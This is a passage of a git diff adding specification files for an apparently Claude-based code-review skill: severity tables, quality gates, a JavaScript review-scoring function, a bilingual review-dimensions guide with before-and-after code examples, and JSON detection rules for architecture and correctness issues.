|----------|-------------|------------------|
|
||||
| `injection` | 注入风险 (SQL/Command) | Critical |
|
||||
| `xss` | 跨站脚本风险 | Critical |
|
||||
| `hardcoded-secret` | 硬编码密钥 | Critical |
|
||||
| `auth` | 认证授权问题 | High |
|
||||
| `sensitive-data` | 敏感数据暴露 | High |
|
||||
| `insecure-dependency` | 不安全依赖 | Medium |
|
||||
|
||||
#### Performance Categories
|
||||
|
||||
| Category | Description | Default Severity |
|
||||
|----------|-------------|------------------|
|
||||
| `complexity` | 高算法复杂度 | Medium |
|
||||
| `n+1-query` | N+1 查询问题 | High |
|
||||
| `memory-leak` | 内存泄漏 | High |
|
||||
| `blocking-io` | 阻塞 I/O | Medium |
|
||||
| `inefficient-algorithm` | 低效算法 | Medium |
|
||||
| `missing-cache` | 缺少缓存 | Low |
|
||||
|
||||
#### Readability Categories
|
||||
|
||||
| Category | Description | Default Severity |
|
||||
|----------|-------------|------------------|
|
||||
| `naming` | 命名问题 | Medium |
|
||||
| `function-length` | 函数过长 | Medium |
|
||||
| `nesting-depth` | 嵌套过深 | Medium |
|
||||
| `comments` | 注释问题 | Low |
|
||||
| `duplication` | 代码重复 | Medium |
|
||||
| `magic-number` | 魔法数字 | Low |
|
||||
|
||||
#### Testing Categories
|
||||
|
||||
| Category | Description | Default Severity |
|
||||
|----------|-------------|------------------|
|
||||
| `coverage` | 测试覆盖不足 | Medium |
|
||||
| `boundary-test` | 缺少边界测试 | Medium |
|
||||
| `mock-abuse` | Mock 过度使用 | Low |
|
||||
| `test-isolation` | 测试不独立 | Medium |
|
||||
| `flaky-test` | 不稳定测试 | High |
|
||||
|
||||
#### Architecture Categories
|
||||
|
||||
| Category | Description | Default Severity |
|
||||
|----------|-------------|------------------|
|
||||
| `layer-violation` | 层次违规 | Medium |
|
||||
| `circular-dependency` | 循环依赖 | High |
|
||||
| `coupling` | 耦合过紧 | Medium |
|
||||
| `srp-violation` | 单一职责违规 | Medium |
|
||||
| `god-class` | 上帝类 | High |
|
||||
|
||||
---
|
||||
|
||||
## Finding ID Format
|
||||
|
||||
```
|
||||
{PREFIX}-{NNN}
|
||||
|
||||
Prefixes by Dimension:
|
||||
- CORR: Correctness
|
||||
- SEC: Security
|
||||
- PERF: Performance
|
||||
- READ: Readability
|
||||
- TEST: Testing
|
||||
- ARCH: Architecture
|
||||
|
||||
Examples:
|
||||
- SEC-001: First security finding
|
||||
- CORR-015: 15th correctness finding
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Quality Gates
|
||||
|
||||
| Gate | Condition | Action |
|
||||
|------|-----------|--------|
|
||||
| **Block** | Critical > 0 | 禁止合并 |
|
||||
| **Warn** | High > 0 | 需要审批 |
|
||||
| **Pass** | Critical = 0, High = 0 | 允许合并 |
|
||||
|
||||
### Recommended Thresholds
|
||||
|
||||
| Metric | Ideal | Acceptable | Needs Work |
|
||||
|--------|-------|------------|------------|
|
||||
| Critical | 0 | 0 | Any > 0 |
|
||||
| High | 0 | ≤ 2 | > 2 |
|
||||
| Medium | ≤ 5 | ≤ 10 | > 10 |
|
||||
| Total | ≤ 10 | ≤ 20 | > 20 |
|
||||
214
.claude/skills/review-code/specs/quality-standards.md
Normal file
@@ -0,0 +1,214 @@
|
||||
# Quality Standards
|
||||
|
||||
代码审查质量标准。
|
||||
|
||||
## When to Use
|
||||
|
||||
| Phase | Usage | Section |
|
||||
|-------|-------|---------|
|
||||
| action-generate-report | 质量评估 | Quality Dimensions |
|
||||
| action-complete | 最终评分 | Quality Gates |
|
||||
|
||||
---
|
||||
|
||||
## Quality Dimensions
|
||||
|
||||
### 1. Completeness (完整性) - 25%
|
||||
|
||||
**评估审查覆盖的完整程度**
|
||||
|
||||
| Score | Criteria |
|
||||
|-------|----------|
|
||||
| 100% | 所有维度审查完成,所有高风险文件检查 |
|
||||
| 80% | 核心维度完成,主要文件检查 |
|
||||
| 60% | 部分维度完成 |
|
||||
| < 60% | 审查不完整 |
|
||||
|
||||
**检查点**:
|
||||
- [ ] 6 个维度全部审查
|
||||
- [ ] 高风险区域重点检查
|
||||
- [ ] 关键文件覆盖
|
||||
|
||||
---
|
||||
|
||||
### 2. Accuracy (准确性) - 25%
|
||||
|
||||
**评估发现问题的准确程度**
|
||||
|
||||
| Score | Criteria |
|
||||
|-------|----------|
|
||||
| 100% | 问题定位准确,分类正确,无误报 |
|
||||
| 80% | 偶有分类偏差,定位准确 |
|
||||
| 60% | 存在误报或漏报 |
|
||||
| < 60% | 准确性差 |
|
||||
|
||||
**检查点**:
|
||||
- [ ] 问题行号准确
|
||||
- [ ] 严重程度合理
|
||||
- [ ] 分类正确
|
||||
|
||||
---
|
||||
|
||||
### 3. Actionability (可操作性) - 25%
|
||||
|
||||
**评估建议的实用程度**
|
||||
|
||||
| Score | Criteria |
|
||||
|-------|----------|
|
||||
| 100% | 每个问题都有具体可执行的修复建议 |
|
||||
| 80% | 大部分问题有清晰建议 |
|
||||
| 60% | 建议较笼统 |
|
||||
| < 60% | 缺乏可操作建议 |
|
||||
|
||||
**检查点**:
|
||||
- [ ] 提供具体修复建议
|
||||
- [ ] 包含代码示例
|
||||
- [ ] 说明修复优先级
|
||||
|
||||
---
|
||||
|
||||
### 4. Consistency (一致性) - 25%
|
||||
|
||||
**评估审查标准的一致程度**
|
||||
|
||||
| Score | Criteria |
|
||||
|-------|----------|
|
||||
| 100% | 相同问题相同处理,标准统一 |
|
||||
| 80% | 基本一致,偶有差异 |
|
||||
| 60% | 标准不太统一 |
|
||||
| < 60% | 标准混乱 |
|
||||
|
||||
**检查点**:
|
||||
- [ ] ID 格式统一
|
||||
- [ ] 严重程度标准一致
|
||||
- [ ] 描述风格统一
|
||||
|
||||
---
|
||||
|
||||
## Quality Gates
|
||||
|
||||
### Review Quality Gate
|
||||
|
||||
| Gate | Overall Score | Action |
|
||||
|------|---------------|--------|
|
||||
| **Excellent** | ≥ 90% | 高质量审查 |
|
||||
| **Good** | ≥ 80% | 合格审查 |
|
||||
| **Acceptable** | ≥ 70% | 基本可接受 |
|
||||
| **Needs Improvement** | < 70% | 需要改进 |
|
||||
|
||||
### Code Quality Gate (Based on Findings)
|
||||
|
||||
| Gate | Condition | Recommendation |
|
||||
|------|-----------|----------------|
|
||||
| **Block** | Critical > 0 | 禁止合并,必须修复 |
|
||||
| **Warn** | High > 3 | 需要团队讨论 |
|
||||
| **Caution** | Medium > 10 | 建议改进 |
|
||||
| **Pass** | 其他 | 可以合并 |
|
||||
|
||||
---
|
||||
|
||||
## Report Quality Checklist
|
||||
|
||||
### Structure
|
||||
|
||||
- [ ] 包含审查概览
|
||||
- [ ] 包含问题统计
|
||||
- [ ] 包含高风险区域
|
||||
- [ ] 包含问题详情
|
||||
- [ ] 包含修复建议
|
||||
|
||||
### Content
|
||||
|
||||
- [ ] 问题描述清晰
|
||||
- [ ] 文件位置准确
|
||||
- [ ] 代码片段有效
|
||||
- [ ] 修复建议具体
|
||||
- [ ] 优先级明确
|
||||
|
||||
### Format
|
||||
|
||||
- [ ] Markdown 格式正确
|
||||
- [ ] 表格对齐
|
||||
- [ ] 代码块语法正确
|
||||
- [ ] 链接有效
|
||||
- [ ] 无拼写错误
|
||||
|
||||
---
|
||||
|
||||
## Validation Function
|
||||
|
||||
```javascript
|
||||
/**
 * Score the quality of a review session.
 *
 * Four equally-weighted dimensions (25% each):
 *  - completeness: fraction of the 6 review dimensions completed
 *  - accuracy: estimated from the execution error count (a proxy;
 *    manual verification or later feedback would be a better signal)
 *  - actionability: fraction of findings carrying a recommendation
 *  - consistency: fraction of findings with a well-formed ID
 *
 * Defensive against partially-populated states: a missing `findings`
 * object no longer throws, and a missing `error_count` no longer
 * produces a NaN overall score.
 *
 * @param {object} state - Review state (see state-schema.md)
 * @returns {{scores: object, overall: number, gate: string}}
 *   Per-dimension scores (0-100), the weighted overall score, and the
 *   quality-gate label ('excellent' | 'good' | 'acceptable' | 'needs_improvement').
 */
function validateReviewQuality(state) {
  const TOTAL_DIMENSIONS = 6;
  const ID_PATTERN = /^(CORR|SEC|PERF|READ|TEST|ARCH)-\d{3}$/;

  const scores = {
    completeness: 0,
    accuracy: 0,
    actionability: 0,
    consistency: 0
  };

  // 1. Completeness — how many of the 6 dimensions were reviewed.
  const dimensionsReviewed = state.reviewed_dimensions?.length || 0;
  scores.completeness = (dimensionsReviewed / TOTAL_DIMENSIONS) * 100;

  // 2. Accuracy (needs manual verification or follow-up feedback);
  // estimated from error count for now. `?? 0` guards a missing
  // error_count, which previously evaluated to NaN (100 - undefined * 20).
  const errorCount = state.error_count ?? 0;
  scores.accuracy = errorCount === 0 ? 100 : Math.max(0, 100 - errorCount * 20);

  // 3. Actionability — findings should carry a concrete recommendation.
  // `?? {}` guards a state where findings was never populated
  // (Object.values(null) previously threw a TypeError).
  const findings = Object.values(state.findings ?? {}).flat();
  const withRecommendations = findings.filter(f => f.recommendation).length;
  scores.actionability = findings.length > 0
    ? (withRecommendations / findings.length) * 100
    : 100;

  // 4. Consistency — finding IDs must match the documented format.
  const validIds = findings.filter(f => ID_PATTERN.test(f.id)).length;
  scores.consistency = findings.length > 0
    ? (validIds / findings.length) * 100
    : 100;

  // Overall: equal 25% weight per dimension.
  const overall = (
    scores.completeness * 0.25 +
    scores.accuracy * 0.25 +
    scores.actionability * 0.25 +
    scores.consistency * 0.25
  );

  return {
    scores,
    overall,
    gate: overall >= 90 ? 'excellent' :
          overall >= 80 ? 'good' :
          overall >= 70 ? 'acceptable' : 'needs_improvement'
  };
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Improvement Recommendations
|
||||
|
||||
### If Completeness is Low
|
||||
|
||||
- 增加扫描的文件范围
|
||||
- 确保所有维度都被审查
|
||||
- 重点关注高风险区域
|
||||
|
||||
### If Accuracy is Low
|
||||
|
||||
- 提高规则精度
|
||||
- 减少误报
|
||||
- 验证行号准确性
|
||||
|
||||
### If Actionability is Low
|
||||
|
||||
- 为每个问题添加修复建议
|
||||
- 提供代码示例
|
||||
- 说明修复步骤
|
||||
|
||||
### If Consistency is Low
|
||||
|
||||
- 统一 ID 格式
|
||||
- 标准化严重程度判定
|
||||
- 使用模板化描述
|
||||
337
.claude/skills/review-code/specs/review-dimensions.md
Normal file
@@ -0,0 +1,337 @@
|
||||
# Review Dimensions
|
||||
|
||||
代码审查维度定义和检查点规范。
|
||||
|
||||
## When to Use
|
||||
|
||||
| Phase | Usage | Section |
|
||||
|-------|-------|---------|
|
||||
| action-deep-review | 获取维度检查规则 | All |
|
||||
| action-generate-report | 维度名称映射 | Dimension Names |
|
||||
|
||||
---
|
||||
|
||||
## Dimension Overview
|
||||
|
||||
| Dimension | Weight | Focus | Key Indicators |
|
||||
|-----------|--------|-------|----------------|
|
||||
| **Correctness** | 25% | 功能正确性 | 边界条件、错误处理、类型安全 |
|
||||
| **Security** | 25% | 安全风险 | 注入攻击、敏感数据、权限 |
|
||||
| **Performance** | 15% | 执行效率 | 算法复杂度、资源使用 |
|
||||
| **Readability** | 15% | 可维护性 | 命名、结构、注释 |
|
||||
| **Testing** | 10% | 测试质量 | 覆盖率、边界测试 |
|
||||
| **Architecture** | 10% | 架构一致性 | 分层、依赖、模式 |
|
||||
|
||||
---
|
||||
|
||||
## 1. Correctness (正确性)
|
||||
|
||||
### 检查清单
|
||||
|
||||
- [ ] **边界条件处理**
|
||||
- 空数组/空字符串
|
||||
- Null/Undefined
|
||||
- 数值边界 (0, 负数, MAX_INT)
|
||||
- 集合边界 (首元素, 末元素)
|
||||
|
||||
- [ ] **错误处理**
|
||||
- Try-catch 覆盖
|
||||
- 错误不被静默吞掉
|
||||
- 错误信息有意义
|
||||
- 资源正确释放
|
||||
|
||||
- [ ] **类型安全**
|
||||
- 类型转换正确
|
||||
- 避免隐式转换
|
||||
- TypeScript strict mode
|
||||
|
||||
- [ ] **逻辑完整性**
|
||||
- If-else 分支完整
|
||||
- Switch 有 default
|
||||
- 循环终止条件正确
|
||||
|
||||
### 常见问题模式
|
||||
|
||||
```javascript
|
||||
// ❌ 问题: 未检查 null
|
||||
function getName(user) {
|
||||
return user.name.toUpperCase(); // user 可能为 null
|
||||
}
|
||||
|
||||
// ✅ 修复
|
||||
function getName(user) {
|
||||
return user?.name?.toUpperCase() ?? 'Unknown';
|
||||
}
|
||||
|
||||
// ❌ 问题: 空 catch 块
|
||||
try {
|
||||
await fetchData();
|
||||
} catch (e) {} // 错误被静默吞掉
|
||||
|
||||
// ✅ 修复
|
||||
try {
|
||||
await fetchData();
|
||||
} catch (e) {
|
||||
console.error('Failed to fetch data:', e);
|
||||
throw e;
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 2. Security (安全性)
|
||||
|
||||
### 检查清单
|
||||
|
||||
- [ ] **注入防护**
|
||||
- SQL 注入 (使用参数化查询)
|
||||
- XSS (避免 innerHTML)
|
||||
- 命令注入 (避免 exec)
|
||||
- 路径遍历
|
||||
|
||||
- [ ] **认证授权**
|
||||
- 权限检查完整
|
||||
- Token 验证
|
||||
- Session 管理
|
||||
|
||||
- [ ] **敏感数据**
|
||||
- 无硬编码密钥
|
||||
- 日志不含敏感信息
|
||||
- 传输加密
|
||||
|
||||
- [ ] **依赖安全**
|
||||
- 无已知漏洞依赖
|
||||
- 版本锁定
|
||||
|
||||
### 常见问题模式
|
||||
|
||||
```javascript
|
||||
// ❌ 问题: SQL 注入风险
|
||||
const query = `SELECT * FROM users WHERE id = ${userId}`;
|
||||
|
||||
// ✅ 修复: 参数化查询
|
||||
const query = `SELECT * FROM users WHERE id = ?`;
|
||||
db.query(query, [userId]);
|
||||
|
||||
// ❌ 问题: XSS 风险
|
||||
element.innerHTML = userInput;
|
||||
|
||||
// ✅ 修复
|
||||
element.textContent = userInput;
|
||||
|
||||
// ❌ 问题: 硬编码密钥
|
||||
const apiKey = 'sk-xxxxxxxxxxxx';
|
||||
|
||||
// ✅ 修复
|
||||
const apiKey = process.env.API_KEY;
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 3. Performance (性能)
|
||||
|
||||
### 检查清单
|
||||
|
||||
- [ ] **算法复杂度**
|
||||
- 避免 O(n²) 在大数据集
|
||||
- 使用合适的数据结构
|
||||
- 避免不必要的循环
|
||||
|
||||
- [ ] **I/O 效率**
|
||||
- 批量操作 vs 循环单条
|
||||
- 避免 N+1 查询
|
||||
- 适当使用缓存
|
||||
|
||||
- [ ] **资源使用**
|
||||
- 内存泄漏
|
||||
- 连接池使用
|
||||
- 大文件流式处理
|
||||
|
||||
- [ ] **异步处理**
|
||||
- 并行 vs 串行
|
||||
- Promise.all 使用
|
||||
- 避免阻塞
|
||||
|
||||
### 常见问题模式
|
||||
|
||||
```javascript
|
||||
// ❌ 问题: N+1 查询
|
||||
for (const user of users) {
|
||||
const posts = await db.query('SELECT * FROM posts WHERE user_id = ?', [user.id]);
|
||||
}
|
||||
|
||||
// ✅ 修复: 批量查询
|
||||
const userIds = users.map(u => u.id);
|
||||
const posts = await db.query('SELECT * FROM posts WHERE user_id IN (?)', [userIds]);
|
||||
|
||||
// ❌ 问题: 串行执行可并行操作
|
||||
const a = await fetchA();
|
||||
const b = await fetchB();
|
||||
const c = await fetchC();
|
||||
|
||||
// ✅ 修复: 并行执行
|
||||
const [a, b, c] = await Promise.all([fetchA(), fetchB(), fetchC()]);
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 4. Readability (可读性)
|
||||
|
||||
### 检查清单
|
||||
|
||||
- [ ] **命名规范**
|
||||
- 变量名见名知意
|
||||
- 函数名表达动作
|
||||
- 常量使用 UPPER_CASE
|
||||
- 避免缩写和单字母
|
||||
|
||||
- [ ] **函数设计**
|
||||
- 单一职责
|
||||
- 长度 < 50 行
|
||||
- 参数 < 5 个
|
||||
- 嵌套 < 4 层
|
||||
|
||||
- [ ] **代码组织**
|
||||
- 逻辑分组
|
||||
- 空行分隔
|
||||
- Import 顺序
|
||||
|
||||
- [ ] **注释质量**
|
||||
- 解释 WHY 而非 WHAT
|
||||
- 及时更新
|
||||
- 无冗余注释
|
||||
|
||||
### 常见问题模式
|
||||
|
||||
```javascript
|
||||
// ❌ 问题: 命名不清晰
|
||||
const d = new Date();
|
||||
const a = users.filter(x => x.s === 'active');
|
||||
|
||||
// ✅ 修复
|
||||
const currentDate = new Date();
|
||||
const activeUsers = users.filter(user => user.status === 'active');
|
||||
|
||||
// ❌ 问题: 函数过长、职责过多
|
||||
function processOrder(order) {
|
||||
// ... 200 行代码,包含验证、计算、保存、通知
|
||||
}
|
||||
|
||||
// ✅ 修复: 拆分职责
|
||||
function validateOrder(order) { /* ... */ }
|
||||
function calculateTotal(order) { /* ... */ }
|
||||
function saveOrder(order) { /* ... */ }
|
||||
function notifyCustomer(order) { /* ... */ }
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 5. Testing (测试)
|
||||
|
||||
### 检查清单
|
||||
|
||||
- [ ] **测试覆盖**
|
||||
- 核心逻辑有测试
|
||||
- 边界条件有测试
|
||||
- 错误路径有测试
|
||||
|
||||
- [ ] **测试质量**
|
||||
- 测试独立
|
||||
- 断言明确
|
||||
- Mock 适度
|
||||
|
||||
- [ ] **测试可维护性**
|
||||
- 命名清晰
|
||||
- 结构统一
|
||||
- 避免重复
|
||||
|
||||
### 常见问题模式
|
||||
|
||||
```javascript
|
||||
// ❌ 问题: 测试不独立
|
||||
let counter = 0;
|
||||
test('increment', () => {
|
||||
counter++; // 依赖外部状态
|
||||
expect(counter).toBe(1);
|
||||
});
|
||||
|
||||
// ✅ 修复: 每个测试独立
|
||||
test('increment', () => {
|
||||
const counter = new Counter();
|
||||
counter.increment();
|
||||
expect(counter.value).toBe(1);
|
||||
});
|
||||
|
||||
// ❌ 问题: 缺少边界测试
|
||||
test('divide', () => {
|
||||
expect(divide(10, 2)).toBe(5);
|
||||
});
|
||||
|
||||
// ✅ 修复: 包含边界情况
|
||||
test('divide by zero throws', () => {
|
||||
expect(() => divide(10, 0)).toThrow();
|
||||
});
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 6. Architecture (架构)
|
||||
|
||||
### 检查清单
|
||||
|
||||
- [ ] **分层结构**
|
||||
- 层次清晰
|
||||
- 依赖方向正确
|
||||
- 无循环依赖
|
||||
|
||||
- [ ] **模块化**
|
||||
- 高内聚低耦合
|
||||
- 接口定义清晰
|
||||
- 职责单一
|
||||
|
||||
- [ ] **设计模式**
|
||||
- 使用合适的模式
|
||||
- 避免过度设计
|
||||
- 遵循项目既有模式
|
||||
|
||||
### 常见问题模式
|
||||
|
||||
```javascript
|
||||
// ❌ 问题: 层次混乱 (Controller 直接操作数据库)
|
||||
class UserController {
|
||||
async getUser(req, res) {
|
||||
const user = await db.query('SELECT * FROM users WHERE id = ?', [req.params.id]);
|
||||
res.json(user);
|
||||
}
|
||||
}
|
||||
|
||||
// ✅ 修复: 分层清晰
|
||||
class UserController {
|
||||
constructor(private userService: UserService) {}
|
||||
|
||||
async getUser(req, res) {
|
||||
const user = await this.userService.findById(req.params.id);
|
||||
res.json(user);
|
||||
}
|
||||
}
|
||||
|
||||
// ❌ 问题: 循环依赖
|
||||
// moduleA.ts
|
||||
import { funcB } from './moduleB';
|
||||
// moduleB.ts
|
||||
import { funcA } from './moduleA';
|
||||
|
||||
// ✅ 修复: 提取共享模块或使用依赖注入
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Severity Mapping
|
||||
|
||||
| Severity | Criteria |
|
||||
|----------|----------|
|
||||
| **Critical** | 安全漏洞、数据损坏风险、崩溃风险 |
|
||||
| **High** | 功能缺陷、性能严重问题、重要边界未处理 |
|
||||
| **Medium** | 代码质量问题、可维护性问题 |
|
||||
| **Low** | 风格问题、优化建议 |
|
||||
| **Info** | 信息性建议、学习机会 |
|
||||
@@ -0,0 +1,63 @@
|
||||
{
|
||||
"dimension": "architecture",
|
||||
"prefix": "ARCH",
|
||||
"description": "Rules for detecting architecture issues including coupling, layering, and design patterns",
|
||||
"rules": [
|
||||
{
|
||||
"id": "circular-dependency",
|
||||
"category": "dependency",
|
||||
"severity": "high",
|
||||
"pattern": "import\\s+.*from\\s+['\"]\\.\\..*['\"]",
|
||||
"patternType": "regex",
|
||||
"contextPattern": "export.*import.*from.*same-module",
|
||||
"description": "Potential circular dependency detected. Circular imports cause initialization issues and tight coupling",
|
||||
"recommendation": "Extract shared code to a separate module, use dependency injection, or restructure the dependency graph",
|
||||
"fixExample": "// Before - A imports B, B imports A\n// moduleA.ts\nimport { funcB } from './moduleB';\nexport const funcA = () => funcB();\n\n// moduleB.ts\nimport { funcA } from './moduleA'; // circular!\n\n// After - extract shared logic\n// shared.ts\nexport const sharedLogic = () => { ... };\n\n// moduleA.ts\nimport { sharedLogic } from './shared';"
|
||||
},
|
||||
{
|
||||
"id": "god-class",
|
||||
"category": "single-responsibility",
|
||||
"severity": "high",
|
||||
"pattern": "class\\s+\\w+\\s*\\{",
|
||||
"patternType": "regex",
|
||||
"methodThreshold": 15,
|
||||
"lineThreshold": 300,
|
||||
"description": "Class with too many methods or lines violates single responsibility principle",
|
||||
"recommendation": "Split into smaller, focused classes. Each class should have one reason to change",
|
||||
"fixExample": "// Before - UserManager handles everything\nclass UserManager {\n createUser() { ... }\n updateUser() { ... }\n sendEmail() { ... }\n generateReport() { ... }\n validatePassword() { ... }\n}\n\n// After - separated concerns\nclass UserRepository { create, update, delete }\nclass EmailService { sendEmail }\nclass ReportGenerator { generate }\nclass PasswordValidator { validate }"
|
||||
},
|
||||
{
|
||||
"id": "layer-violation",
|
||||
"category": "layering",
|
||||
"severity": "high",
|
||||
"pattern": "import.*(?:repository|database|sql|prisma|mongoose).*from",
|
||||
"patternType": "regex",
|
||||
"contextPath": ["controller", "handler", "route", "component"],
|
||||
"description": "Direct database access from presentation layer violates layered architecture",
|
||||
"recommendation": "Access data through service/use-case layer. Keep controllers thin and delegate to services",
|
||||
"fixExample": "// Before - controller accesses DB directly\nimport { prisma } from './database';\nconst getUsers = async () => prisma.user.findMany();\n\n// After - use service layer\nimport { userService } from './services';\nconst getUsers = async () => userService.getAll();"
|
||||
},
|
||||
{
|
||||
"id": "missing-interface",
|
||||
"category": "abstraction",
|
||||
"severity": "medium",
|
||||
"pattern": "new\\s+\\w+Service\\(|new\\s+\\w+Repository\\(",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["interface", "implements", "inject"],
|
||||
"description": "Direct instantiation of services/repositories creates tight coupling",
|
||||
"recommendation": "Define interfaces and use dependency injection for loose coupling and testability",
|
||||
"fixExample": "// Before - tight coupling\nclass OrderService {\n private repo = new OrderRepository();\n}\n\n// After - loose coupling\ninterface IOrderRepository {\n findById(id: string): Promise<Order>;\n}\n\nclass OrderService {\n constructor(private repo: IOrderRepository) {}\n}"
|
||||
},
|
||||
{
|
||||
"id": "mixed-concerns",
|
||||
"category": "separation-of-concerns",
|
||||
"severity": "medium",
|
||||
"pattern": "fetch\\s*\\(|axios\\.|http\\.",
|
||||
"patternType": "regex",
|
||||
"contextPath": ["component", "view", "page"],
|
||||
"description": "Network calls in UI components mix data fetching with presentation",
|
||||
"recommendation": "Extract data fetching to hooks, services, or state management layer",
|
||||
"fixExample": "// Before - fetch in component\nfunction UserList() {\n const [users, setUsers] = useState([]);\n useEffect(() => {\n fetch('/api/users').then(r => r.json()).then(setUsers);\n }, []);\n}\n\n// After - custom hook\nfunction useUsers() {\n return useQuery('users', () => userService.getAll());\n}\n\nfunction UserList() {\n const { data: users } = useUsers();\n}"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -0,0 +1,60 @@
|
||||
{
|
||||
"dimension": "correctness",
|
||||
"prefix": "CORR",
|
||||
"description": "Rules for detecting logical errors, null handling, and error handling issues",
|
||||
"rules": [
|
||||
{
|
||||
"id": "null-check",
|
||||
"category": "null-check",
|
||||
"severity": "high",
|
||||
"pattern": "\\w+\\.\\w+(?!\\.?\\?)",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["\\?\\.", "if\\s*\\(", "!==?\\s*null", "!==?\\s*undefined", "&&\\s*\\w+\\."],
|
||||
"description": "Property access without null/undefined check may cause runtime errors",
|
||||
"recommendation": "Add null/undefined check before accessing properties using optional chaining or conditional checks",
|
||||
"fixExample": "// Before\nobj.property.value\n\n// After\nobj?.property?.value\n// or\nif (obj && obj.property) { obj.property.value }"
|
||||
},
|
||||
{
|
||||
"id": "empty-catch",
|
||||
"category": "empty-catch",
|
||||
"severity": "high",
|
||||
"pattern": "catch\\s*\\([^)]*\\)\\s*\\{\\s*\\}",
|
||||
"patternType": "regex",
|
||||
"description": "Empty catch block silently swallows errors, hiding bugs and making debugging difficult",
|
||||
"recommendation": "Log the error, rethrow it, or handle it appropriately. Never silently ignore exceptions",
|
||||
"fixExample": "// Before\ncatch (e) { }\n\n// After\ncatch (e) {\n console.error('Operation failed:', e);\n throw e; // or handle appropriately\n}"
|
||||
},
|
||||
{
|
||||
"id": "unreachable-code",
|
||||
"category": "unreachable-code",
|
||||
"severity": "medium",
|
||||
"pattern": "return\\s+[^;]+;\\s*\\n\\s*[^}\\s]",
|
||||
"patternType": "regex",
|
||||
"description": "Code after return statement is unreachable and will never execute",
|
||||
"recommendation": "Remove unreachable code or restructure the logic to ensure all code paths are accessible",
|
||||
"fixExample": "// Before\nfunction example() {\n return value;\n doSomething(); // unreachable\n}\n\n// After\nfunction example() {\n doSomething();\n return value;\n}"
|
||||
},
|
||||
{
|
||||
"id": "array-index-unchecked",
|
||||
"category": "boundary-check",
|
||||
"severity": "high",
|
||||
"pattern": "\\[\\d+\\]|\\[\\w+\\](?!\\s*[!=<>])",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["\\.length", "Array\\.isArray", "\\?.\\["],
|
||||
"description": "Array index access without boundary check may cause undefined access or out-of-bounds errors",
|
||||
"recommendation": "Check array length or use optional chaining before accessing array elements",
|
||||
"fixExample": "// Before\nconst item = arr[index];\n\n// After\nconst item = arr?.[index];\n// or\nconst item = index < arr.length ? arr[index] : defaultValue;"
|
||||
},
|
||||
{
|
||||
"id": "comparison-type-coercion",
|
||||
"category": "type-safety",
|
||||
"severity": "medium",
|
||||
"pattern": "[^!=]==[^=]|[^!]==[^=]",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["===", "!=="],
|
||||
"description": "Using == instead of === can lead to unexpected type coercion",
|
||||
"recommendation": "Use strict equality (===) to avoid implicit type conversion",
|
||||
"fixExample": "// Before\nif (value == null)\nif (a == b)\n\n// After\nif (value === null || value === undefined)\nif (a === b)"
|
||||
}
|
||||
]
|
||||
}
|
||||
140
.claude/skills/review-code/specs/rules/index.md
Normal file
@@ -0,0 +1,140 @@
|
||||
# Code Review Rules Index
|
||||
|
||||
This directory contains externalized review rules for the multi-dimensional code review skill.
|
||||
|
||||
## Directory Structure
|
||||
|
||||
```
|
||||
rules/
|
||||
├── index.md # This file
|
||||
├── correctness-rules.json # CORR - Logic and error handling
|
||||
├── security-rules.json # SEC - Security vulnerabilities
|
||||
├── performance-rules.json # PERF - Performance issues
|
||||
├── readability-rules.json # READ - Code clarity
|
||||
├── testing-rules.json # TEST - Test quality
|
||||
└── architecture-rules.json # ARCH - Design patterns
|
||||
```
|
||||
|
||||
## Rule File Schema
|
||||
|
||||
Each rule file follows this JSON schema:
|
||||
|
||||
```json
|
||||
{
|
||||
"dimension": "string", // Dimension identifier
|
||||
"prefix": "string", // Finding ID prefix (4 chars)
|
||||
"description": "string", // Dimension description
|
||||
"rules": [
|
||||
{
|
||||
"id": "string", // Unique rule identifier
|
||||
"category": "string", // Rule category within dimension
|
||||
"severity": "critical|high|medium|low",
|
||||
"pattern": "string", // Detection pattern
|
||||
"patternType": "regex|includes|ast",
|
||||
"negativePatterns": [], // Patterns that exclude matches
|
||||
"caseInsensitive": false, // For regex patterns
|
||||
"contextPattern": "", // Additional context requirement
|
||||
"contextPath": [], // Path patterns for context
|
||||
"lineThreshold": 0, // For size-based rules
|
||||
"methodThreshold": 0, // For complexity rules
|
||||
"description": "string", // Issue description
|
||||
"recommendation": "string", // How to fix
|
||||
"fixExample": "string" // Code example
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
## Dimension Summary
|
||||
|
||||
| Dimension | Prefix | Rules | Focus Areas |
|
||||
|-----------|--------|-------|-------------|
|
||||
| Correctness | CORR | 5 | Null checks, error handling, type safety |
|
||||
| Security | SEC | 5 | XSS, injection, secrets, crypto |
|
||||
| Performance | PERF | 5 | Complexity, I/O, memory leaks |
|
||||
| Readability | READ | 5 | Naming, length, nesting, magic values |
|
||||
| Testing | TEST | 5 | Assertions, coverage, mock quality |
|
||||
| Architecture | ARCH | 5 | Dependencies, layering, coupling |
|
||||
|
||||
## Severity Levels
|
||||
|
||||
| Severity | Description | Action |
|
||||
|----------|-------------|--------|
|
||||
| **critical** | Security vulnerability or data loss risk | Must fix before release |
|
||||
| **high** | Bug or significant quality issue | Fix in current sprint |
|
||||
| **medium** | Code smell or maintainability concern | Plan to address |
|
||||
| **low** | Style or minor improvement | Address when convenient |
|
||||
|
||||
## Pattern Types
|
||||
|
||||
### regex
|
||||
Standard regular expression pattern. Supports flags via `caseInsensitive`.
|
||||
|
||||
```json
|
||||
{
|
||||
"pattern": "catch\\s*\\([^)]*\\)\\s*\\{\\s*\\}",
|
||||
"patternType": "regex"
|
||||
}
|
||||
```
|
||||
|
||||
### includes
|
||||
Simple substring match. Faster than regex for literal strings.
|
||||
|
||||
```json
|
||||
{
|
||||
"pattern": "innerHTML",
|
||||
"patternType": "includes"
|
||||
}
|
||||
```
|
||||
|
||||
### ast (Future)
|
||||
AST-based detection for complex structural patterns.
|
||||
|
||||
```json
|
||||
{
|
||||
"pattern": "function[params>5]",
|
